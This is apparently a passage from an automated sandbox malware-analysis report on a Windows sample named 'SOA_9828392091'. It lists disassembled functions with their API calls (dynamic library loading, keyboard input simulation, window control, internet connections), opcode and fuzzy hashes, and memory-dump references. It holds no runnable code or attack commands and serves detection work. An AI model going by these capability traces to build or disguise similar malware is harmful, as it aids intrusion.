                                      • API ID: AddressLibraryLoadProc
                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                      • API String ID: 2574300362-1587604923
                                      • Opcode ID: acbfb5c5073b4b5f4770eec5e713a0c51ca47f11a8d5ca145db2a0c9b091c795
                                      • Instruction ID: 73f08928f1cb46062f154ba22bf25ecf56378f4ee88ce1294451eaacf5d26b18
                                      • Opcode Fuzzy Hash: acbfb5c5073b4b5f4770eec5e713a0c51ca47f11a8d5ca145db2a0c9b091c795
                                      • Instruction Fuzzy Hash: 2AD0A731418312DFC7205F36EC09B027BECAB44314B10C92DF845D2190E7B0C8C08B20
                                      Function 0098ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0098ECBE,?,0098EBBB), ref: 0098ECD6
                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0098ECE8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                      • API String ID: 2574300362-1816364905
                                      • Opcode ID: 99a18c47d69b5588349aa03e6b3d41f97c0797c4b661a042ef0ad43687cf1209
                                      • Instruction ID: 6b5edcdf85f13460b0f04827fec2d85dfde431b995ebf60a9ec0dd62eccf452c
                                      • Opcode Fuzzy Hash: 99a18c47d69b5588349aa03e6b3d41f97c0797c4b661a042ef0ad43687cf1209
                                      • Instruction Fuzzy Hash: E2D0A7319187239FCB256F66ED4860276ECAB04314B00842DF885D2290FFB0CC809710
                                      Function 0098BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0098BAD3,00000001,0098B6EE,?,009CDC00), ref: 0098BAEB
                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0098BAFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetModuleHandleExW$kernel32.dll
                                      • API String ID: 2574300362-199464113
                                      • Opcode ID: 806d3260fcd9941d86d6ec5fd9b2bb47ee7b1d1eaa898e41cf635c03222019f5
                                      • Instruction ID: 33ab9b1a66f7b09dcde6952c71089abf6c9d907b82fc9c37065bc3899b241d9e
                                      • Opcode Fuzzy Hash: 806d3260fcd9941d86d6ec5fd9b2bb47ee7b1d1eaa898e41cf635c03222019f5
                                      • Instruction Fuzzy Hash: 27D0A9308187229FC735AF2AEC48B1276ECAB04325B04842EE883D3290EBB0CC81CB10
                                      Function 00993BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00993BD1,?,00993E06), ref: 00993BE9
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00993BFB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: d06f8573148139b7c5c7cb13f90a9e8339aaa20c3a47ec134d7bc38410bf5e05
                                      • Instruction ID: 8572010fbfab58f94d5be3b25d3cfe72a55a741467faaef59a3c8a537e02a0fa
                                      • Opcode Fuzzy Hash: d06f8573148139b7c5c7cb13f90a9e8339aaa20c3a47ec134d7bc38410bf5e05
                                      • Instruction Fuzzy Hash: A6D0A770418B52BFCF205F69ED08613BBFCAB01728B108429E885E2150F6B0C8808E10
                                      Function 00969B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00c686b8dd75d497e83dbf54947df5cf0a9d2ead54be0ab91a534c5cb0559e1d
                                      • Instruction ID: f509c8707127105fa47930c1d7bf7321bfc3ee9199c645c77c7ddc67d08c4d9e
                                      • Opcode Fuzzy Hash: 00c686b8dd75d497e83dbf54947df5cf0a9d2ead54be0ab91a534c5cb0559e1d
                                      • Instruction Fuzzy Hash: DBC17D75A0021AEFCB14CFA4C994BAEB7B9FF48704F108598E905EB291D735DE41DB90
                                      Function 0098AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0098AAB4
                                      • CoUninitialize.COMBASE ref: 0098AABF
                                        • Part of subcall function 00970213: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0097027B
                                      • VariantInit.OLEAUT32(?), ref: 0098AACA
                                      • VariantClear.OLEAUT32(?), ref: 0098AD9D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 780911581-0
                                      • Opcode ID: 23cceebd792727ad8b6023719c265405ce73fdf457e04177411f7e5c314d4a10
                                      • Instruction ID: a7fd9b9174ebca5c436aad1cee370cd129f38838fc6fe316f6f2a25ed2297478
                                      • Opcode Fuzzy Hash: 23cceebd792727ad8b6023719c265405ce73fdf457e04177411f7e5c314d4a10
                                      • Instruction Fuzzy Hash: A1A15B756047019FDB14EF14C491B1AB7E9FF88710F14884AF99A9B3A2CB74ED44CB86
                                      Function 009691CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: 7af9d055e62cf45da4ae603a7d1b9396cd8ec4bc73d152b8fa2919ef9b4fa5d2
                                      • Instruction ID: c25f1d16de9d66ccb9d40a5653415a0da2c2f044c324fd72af05d12d67931bdc
                                      • Opcode Fuzzy Hash: 7af9d055e62cf45da4ae603a7d1b9396cd8ec4bc73d152b8fa2919ef9b4fa5d2
                                      • Instruction Fuzzy Hash: BE51A1306143069BDB24AF6AD895F2EB3EDEF85314F20881FE556CB3E1DB7498808B05
                                      Function 0099C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(01656B20,?), ref: 0099C544
                                      • ScreenToClient.USER32(?,00000002), ref: 0099C574
                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0099C5DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: 2feda4fcae812ff0e97d5201ac0772faf466ab0c2879c30ce4121f12127e9577
                                      • Instruction ID: bdefc95858d8f5be9641e3cd25330ffb4c3834a61d809357e0b0e1ca3d1bc65f
                                      • Opcode Fuzzy Hash: 2feda4fcae812ff0e97d5201ac0772faf466ab0c2879c30ce4121f12127e9577
                                      • Instruction Fuzzy Hash: 9B514DB5A04209EFCF20DF68CC80AAE7BB9EB59320F108659F9559B290D730ED41DB90
                                      Function 0096C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0096C462
                                      • __itow.LIBCMT ref: 0096C49C
                                        • Part of subcall function 0096C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0096C753
                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0096C505
                                      • __itow.LIBCMT ref: 0096C55A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow
                                      • String ID:
                                      • API String ID: 3379773720-0
                                      • Opcode ID: d08532bcea1ecc0954d6dc280c724811115309220002f3930e93be8c61c7ab37
                                      • Instruction ID: 1c837980cef8a345831082d0aac015ef36282e86b4fc3b395bfeb32969b08faf
                                      • Opcode Fuzzy Hash: d08532bcea1ecc0954d6dc280c724811115309220002f3930e93be8c61c7ab37
                                      • Instruction Fuzzy Hash: 5941B4B1A04608AFDF21EF54CC51BFE7BB9AF89700F000029F946A7291DB709A45CFA1
                                      Function 0097390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00973966
                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00973982
                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009739EF
                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00973A4D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 5b3161cccc662e295142e252912b53c66296eb89261d5ff43e92b6c8143c1f26
                                      • Instruction ID: 7aaff01a7a1ca69f845d9cc714aa9a1812f17c0a24c1388acac24d52341c6dbf
                                      • Opcode Fuzzy Hash: 5b3161cccc662e295142e252912b53c66296eb89261d5ff43e92b6c8143c1f26
                                      • Instruction Fuzzy Hash: F0412972E14208EAEF348B648806BFDBBB9AB55310F04C11AF5C9521C1D7B58E85F765
                                      Function 0099B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0099B5D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 602dfd9189551a45b0b38b9afedb38ca6bd97986be8eb40c7501723f8df3a194
                                      • Instruction ID: a6c2462670fdbbfb31450b597491d8e9630f3db6741b08e79d3e78d67f0a19b3
                                      • Opcode Fuzzy Hash: 602dfd9189551a45b0b38b9afedb38ca6bd97986be8eb40c7501723f8df3a194
                                      • Instruction Fuzzy Hash: 8331BC74611208FBEF208F1CEE89FAC7769AB06320F654515FA51D62E1D738B940DB92
                                      Function 0099D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 0099D807
                                      • GetWindowRect.USER32(?,?), ref: 0099D87D
                                      • PtInRect.USER32(?,?,0099ED5A), ref: 0099D88D
                                      • MessageBeep.USER32(00000000), ref: 0099D8FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: 29ca2b0bfd133c41ec181ffeb6c39dcbe085f0fed3d423e5ae632b337ed7d10b
                                      • Instruction ID: e4b004931952e34d93f16eb90d3810acdf4a9b802135a8a77c6a558d4e3f2eca
                                      • Opcode Fuzzy Hash: 29ca2b0bfd133c41ec181ffeb6c39dcbe085f0fed3d423e5ae632b337ed7d10b
                                      • Instruction Fuzzy Hash: 55418974A06219DFCF11DF5EC8C4BA97BB9BF49320F1881A9E814CB262D330E941DB80
                                      Function 00973A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00973AB8
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00973AD4
                                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00973B34
                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00973B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: cf58a92110b25f6f6f174b2c97419a67f7f81c4a3ba9b3219bf8eda95d3b898e
                                      • Instruction ID: 84b5b2be83a4244a3a589daad1d1d09391107b86eeabf13aa755e1a10c04a175
                                      • Opcode Fuzzy Hash: cf58a92110b25f6f6f174b2c97419a67f7f81c4a3ba9b3219bf8eda95d3b898e
                                      • Instruction Fuzzy Hash: C1315672A14258AEEF308B64C819BFE7BAD9B95320F04C21AF4C9932D1C7748F45E761
                                      Function 00964004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00964038
                                      • __isleadbyte_l.LIBCMT ref: 00964066
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00964094
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009640CA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 7f253ec64f4eee8738aec6a66331c3cf508284e6b64ff4a6b1bec4f6af41567d
                                      • Instruction ID: 7895f3ec2efc430b0039c9117ea55153b9d5a8e028f196ac0665ad5c54d6a113
                                      • Opcode Fuzzy Hash: 7f253ec64f4eee8738aec6a66331c3cf508284e6b64ff4a6b1bec4f6af41567d
                                      • Instruction Fuzzy Hash: EE31EF30604226EFDB21DFB5C844BBB7BA9FF40320F158429EA618B1A1E731D890DB90
                                      Function 00997CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00997CB9
                                        • Part of subcall function 00975F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00975F6F
                                        • Part of subcall function 00975F55: GetCurrentThreadId.KERNEL32 ref: 00975F76
                                        • Part of subcall function 00975F55: AttachThreadInput.USER32(00000000,?,0097781F), ref: 00975F7D
                                      • GetCaretPos.USER32(?), ref: 00997CCA
                                      • ClientToScreen.USER32(00000000,?), ref: 00997D03
                                      • GetForegroundWindow.USER32 ref: 00997D09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: 28d4be597bc1b22b444438bbd5a3041a2692fc82d988017351ac6b0b97bf1830
                                      • Instruction ID: 0e46e6bdbec4c97ff541202c1720e0392d6526f13acb0acb95e7bc8821a88cd6
                                      • Opcode Fuzzy Hash: 28d4be597bc1b22b444438bbd5a3041a2692fc82d988017351ac6b0b97bf1830
                                      • Instruction Fuzzy Hash: 2C31F0B2D00108AFDB10EFA9D985DEFFBF9EF94314B118466F855E7211DA319E058BA0
                                      Function 0098431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00984358
                                        • Part of subcall function 009843E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00984401
                                        • Part of subcall function 009843E2: InternetCloseHandle.WININET(00000000), ref: 0098449E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
